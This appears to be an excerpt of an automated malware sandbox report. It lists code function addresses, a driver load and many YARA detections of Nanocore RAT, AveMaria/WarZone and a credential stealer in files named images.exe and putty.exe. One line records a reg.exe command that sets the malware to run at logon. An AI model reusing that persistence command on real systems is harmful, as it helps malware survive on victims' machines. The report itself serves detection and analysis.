        Source: C:\ProgramData\images.exeCode function: 17_2_0035D8FC17_2_0035D8FC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C4CC17_2_0035C4CC
        Source: C:\ProgramData\images.exeCode function: 17_2_0035B53017_2_0035B530
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D92017_2_0035D920
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CD1817_2_0035CD18
        Source: C:\ProgramData\images.exeCode function: 17_2_0035C50017_2_0035C500
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D14117_2_0035D141
        Source: C:\ProgramData\images.exeCode function: 17_2_003595B117_2_003595B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5B117_2_0035A5B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9B117_2_0035A9B1
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A9C017_2_0035A9C0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A5C017_2_0035A5C0
        Source: C:\ProgramData\images.exeCode function: 17_2_003595C017_2_003595C0
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A7817_2_00355A78
        Source: C:\ProgramData\images.exeCode function: 17_2_0035F24817_2_0035F248
        Source: C:\ProgramData\images.exeCode function: 17_2_0035CA8C17_2_0035CA8C
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A28817_2_0035A288
        Source: C:\ProgramData\images.exeCode function: 17_2_00355A8817_2_00355A88
        Source: C:\ProgramData\images.exeCode function: 17_2_00355EF817_2_00355EF8
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BEC417_2_0035BEC4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035AB3017_2_0035AB30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035BF3017_2_0035BF30
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF6017_2_0035DF60
        Source: C:\ProgramData\images.exeCode function: 17_2_0035DF4F17_2_0035DF4F
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A7A017_2_0035A7A0
        Source: C:\ProgramData\images.exeCode function: 17_2_0035A79017_2_0035A790
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C417_2_0035D3C4
        Source: C:\ProgramData\images.exeCode function: 17_2_0035D3C817_2_0035D3C8
        Source: C:\ProgramData\images.exeCode function: 17_2_004A007017_2_004A0070
        Source: C:\ProgramData\images.exeCode function: 17_2_0118A5BD17_2_0118A5BD
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A5017_2_00350A50
        Source: C:\ProgramData\images.exeCode function: 17_2_00350A4017_2_00350A40
        Source: C:\ProgramData\images.exeCode function: 17_2_003531F817_2_003531F8
        Source: C:\ProgramData\images.exeCode function: 17_2_003531E817_2_003531E8
        Source: C:\ProgramData\images.exeCode function: 21_3_042442D021_3_042442D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04281AA021_3_04281AA0
        Source: C:\ProgramData\images.exeCode function: 21_3_04276B5021_3_04276B50
        Source: C:\ProgramData\images.exeCode function: 21_3_042404D021_3_042404D0
        Source: C:\ProgramData\images.exeCode function: 21_3_042A25EC21_3_042A25EC
        Source: C:\ProgramData\images.exeCode function: 21_3_042645D021_3_042645D0
        Source: C:\ProgramData\images.exeCode function: 21_3_0423466021_3_04234660
        Source: C:\ProgramData\images.exeCode function: 21_3_042456B021_3_042456B0
        Source: C:\ProgramData\images.exeCode function: 21_3_0424872021_3_04248720
        Source: C:\ProgramData\images.exeCode function: 21_3_0424973021_3_04249730
        Source: C:\ProgramData\images.exeCode function: 21_3_0424601021_3_04246010
        Source: C:\ProgramData\images.exeCode function: 21_3_0427E17021_3_0427E170
        Source: C:\ProgramData\images.exeCode function: 21_3_042511E021_3_042511E0
        Source: C:\ProgramData\images.exeCode function: 21_3_0429E32F21_3_0429E32F
        Source: C:\ProgramData\images.exeCode function: 21_3_0424235021_3_04242350
        Source: C:\Windows\System32\drvinst.exe Process token adjusted: Load Driver
        Source: C:\ProgramData\images.exe Code function: String function: 042358A0 appears 70 times
        Source: C:\ProgramData\images.exe Code function: String function: 042362B0 appears 93 times
        Source: C:\ProgramData\images.exe Code function: String function: 04235680 appears 38 times
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 004036F7 appears 144 times
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 0040357C appears 62 times
        Source: C:\Users\user\AppData\Roaming\putty.exe Code function: String function: 00411E88 appears 98 times
        Source: unknown Driver loaded: C:\Windows\System32\drivers\rdpdr.sys
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c60000.14.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.800000.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cd0000.16.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37dbf76.31.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37d3147.33.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.254c328.23.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.ac0000.9.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.37ea3a6.32.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.cb0000.15.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c00000.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.2537cec.24.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.c50000.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.be0000.10.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.5d0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
